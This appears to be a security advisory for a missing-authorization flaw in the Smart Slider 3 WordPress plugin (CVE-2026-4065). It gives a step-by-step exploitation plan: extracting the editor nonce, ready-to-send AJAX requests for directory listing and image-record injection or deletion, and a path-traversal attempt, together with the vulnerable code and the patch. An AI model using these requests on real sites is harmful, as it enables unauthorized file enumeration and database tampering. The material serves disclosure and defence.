Smart Slider 3 <= 3.5.1.33 - Missing Authorization to Authenticated (Contributor+) Slider Data Read and Image Record Manipulation
Description
The Smart Slider 3 plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple wp_ajax_smart-slider3 controller actions in all versions up to, and including, 3.5.1.33. The display_admin_ajax() method does not call checkForCap() (which requires unfiltered_html capability), and several controller actions only validate the nonce (validateToken()) without calling validatePermission(). This makes it possible for authenticated attackers, with Contributor-level access and above, to enumerate slider metadata and create, modify, and delete image storage records by obtaining the nextend_nonce exposed on post editor pages.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:NTechnical Details
<=3.5.1.33What Changed in the Fix
Changes introduced in v3.5.1.34
Source Code
WordPress.org SVN# Detailed Exploitation Research Plan: CVE-2026-4065 ## 1. Vulnerability Summary The Smart Slider 3 plugin (up to and including 3.5.1.33) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the plugin uses a base controller `AdminAjaxController` that handles var…
Show full research plan
Detailed Exploitation Research Plan: CVE-2026-4065
1. Vulnerability Summary
The Smart Slider 3 plugin (up to and including 3.5.1.33) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the plugin uses a base controller AdminAjaxController that handles various actions via the wp_ajax_smart-slider3 hook. While the plugin implements nonce validation (validateToken()), it fails to perform capability checks (checkForCap() or validatePermission()) in several sensitive controller actions.
As a result, any authenticated user with access to a page where the nextend_nonce is exposed (such as the WordPress post editor) can perform actions intended for administrators, including listing filesystem directories (Information Disclosure) and creating or manipulating image storage records in the database.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - AJAX Action:
smart-slider3 - Vulnerable Parameters:
nextendcontroller: The target controller (e.g.,browseorimage).nextendaction: The target method (e.g.,indexoraddVisual).nextend_nonce: The CSRF token required for validation.
- Authentication: Contributor level or higher.
- Preconditions: The attacker must be authenticated as a Contributor to access the post editor and retrieve the required nonce.
3. Code Flow
- Entry Point: A request is sent to
admin-ajax.php?action=smart-slider3. - Routing: The plugin routes the request based on
nextendcontroller. - Missing Check: In
Nextend/Framework/Browse/ControllerAjaxBrowse.php, theactionIndex()method is invoked.- Line 19:
$this->validateToken();is called (verifiesnextend_nonce). - Vulnerability: No call to
$this->validatePermission()orcurrent_user_can()follows.
- Line 19:
- Execution (Browse):
- The code calculates a path relative to
Filesystem::getImagesFolder(). - It uses
glob()andscandir()to list contents. - Line 95: Returns a JSON response containing the filesystem structure.
- The code calculates a path relative to
- Execution (Image Manipulation):
- In
Nextend/Framework/Image/ControllerAjaxImage.php,actionAddVisual()(Line 38) calls$this->validateToken(). - It proceeds to call
$model->addVisual()which writes to the database without verifying if the user has permission to manage slider images.
- In
4. Nonce Acquisition Strategy
The nextend_nonce is localized for the backend editor.
- Authentication: Log in as a Contributor user.
- Access Editor: Navigate to the new post page (
/wp-admin/post-new.php). - Script Trigger: Smart Slider 3 enqueues its assets on the editor page to support the "Smart Slider" button in the editor toolbar.
- JS Variable Extraction: The nonce is stored within the
_N2JavaScript object, specifically inside theAjaxHelperconfiguration.- Use
browser_evalto extract it:_N2.AjaxHelper.ajaxArray['nextend_nonce'] - Alternatively, it may be found in the global scope if localized via
wp_localize_script.
- Use
5. Exploitation Strategy
Step 1: Directory Enumeration (Read Access)
List the contents of the WordPress uploads directory to identify sensitive files or folder structures.
- HTTP Request:
POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=browse&nextendaction=index HTTP/1.1 Content-Type: application/x-www-form-urlencoded path=/&nextend_nonce=[EXTRACTED_NONCE] - Expected Response: A JSON object containing
directoriesandfileskeys listing the contents of the base image folder.
Step 2: Image Record Manipulation (Write Access)
Inject a malicious or arbitrary image storage record.
- HTTP Request:
POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=addVisual HTTP/1.1 Content-Type: application/x-www-form-urlencoded image=vulnerable_test_image.png&value=payload_data_here&nextend_nonce=[EXTRACTED_NONCE] - Expected Response: A JSON object with the
visualdata, including a newvisualId, confirming the record was created in the database.
6. Test Data Setup
- Create a Contributor user:
wp user create attacker attacker@example.com --role=contributor --user_pass=password123. - Ensure Smart Slider 3 is active.
- (Optional) Create at least one slider to ensure the plugin's database tables are initialized:
wp eval "Nextend\SmartSlider3\Slider\ModelSlider::create(array('title' => 'Test Slider'));".
7. Expected Results
- The
browse/indexrequest should return a listing of thewp-content/uploadsdirectory (or the plugin's configured image root). - The
image/addVisualrequest should return a success status and avisualId, indicating that a Contributor successfully modified the image metadata store, which normally requiresunfiltered_htmlor Administrator privileges.
8. Verification Steps
After performing the HTTP requests:
- Check Directory Access: Verify the JSON response from
browse/indexmatches the actual filesystem.ls -R wp-content/uploads
- Check Database Records: Query the database to see if the visual record was inserted.
wp db query "SELECT * FROM wp_nextend2_image_storage WHERE image = 'vulnerable_test_image.png';"- Note: The table name prefix might vary based on the environment (usually
wp_nextend2_image_storage).
9. Alternative Approaches
If nextendcontroller=browse is blocked or patched differently:
- Delete Visuals: Attempt to delete existing image visuals using
nextendcontroller=image&nextendaction=deleteVisual&visualId=[ID]. - Enumerate Subdirectories: Try path traversal-like structures in the
pathparameter (e.g.,path=../../) to see if therealpathcheck inControllerAjaxBrowse.php(Line 24) can be subverted, although it appears to attempt to anchor to the root.
Summary
The Smart Slider 3 plugin lacks authorization checks on several AJAX controller actions, including directory browsing and image metadata manipulation. This allows authenticated users with Contributor-level access to enumerate files on the server and modify slider-related database records by exploiting a nonce exposed in the post editor.
Vulnerable Code
// Nextend/Framework/Browse/ControllerAjaxBrowse.php:17 public function actionIndex() { $this->validateToken(); $requestedPath = Request::$REQUEST->getVar('path', ''); $root = Filesystem::convertToRealDirectorySeparator(Filesystem::getImagesFolder()); --- // Nextend/Framework/Image/ControllerAjaxImage.php:37 public function actionAddVisual() { $this->validateToken(); $image = Request::$REQUEST->getVar('image'); $this->validateVariable(!empty($image), 'image'); $model = $this->getModel(); if (($visual = $model->addVisual($image, Request::$REQUEST->getVar('value')))) { --- // Nextend/Framework/Image/ControllerAjaxImage.php:54 public function actionDeleteVisual() { $this->validateToken(); $visualId = Request::$REQUEST->getInt('visualId');
Security Fix
@@ -36,6 +36,7 @@ public function actionAddVisual() { $this->validateToken(); + $this->validatePermission('smartslider_edit'); $image = Request::$REQUEST->getVar('image'); $this->validateVariable(!empty($image), 'image'); @@ -54,6 +55,7 @@ public function actionDeleteVisual() { $this->validateToken(); + $this->validatePermission('smartslider_delete'); $visualId = Request::$REQUEST->getInt('visualId'); $this->validateVariable($visualId > 0, 'image'); @@ -72,6 +74,7 @@ public function actionChangeVisual() { $this->validateToken(); + $this->validatePermission('smartslider_edit'); $visualId = Request::$REQUEST->getInt('visualId'); $this->validateVariable($visualId > 0, 'image');
Exploit Outline
1. Authenticate to the WordPress site as a Contributor or higher. 2. Access the WordPress post editor (e.g., `/wp-admin/post-new.php`) and extract the `nextend_nonce` from the `_N2` global JavaScript object (specifically within `_N2.AjaxHelper.ajaxArray`). 3. To enumerate directories: Send a POST request to `/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=browse&nextendaction=index` with parameters `path=/` and the stolen `nextend_nonce`. The response will contain a directory and file listing for the uploads directory. 4. To manipulate image records: Send a POST request to `/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=addVisual` with the stolen `nextend_nonce`, an `image` name, and a `value` containing arbitrary metadata. This injects a record into the image storage database table.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.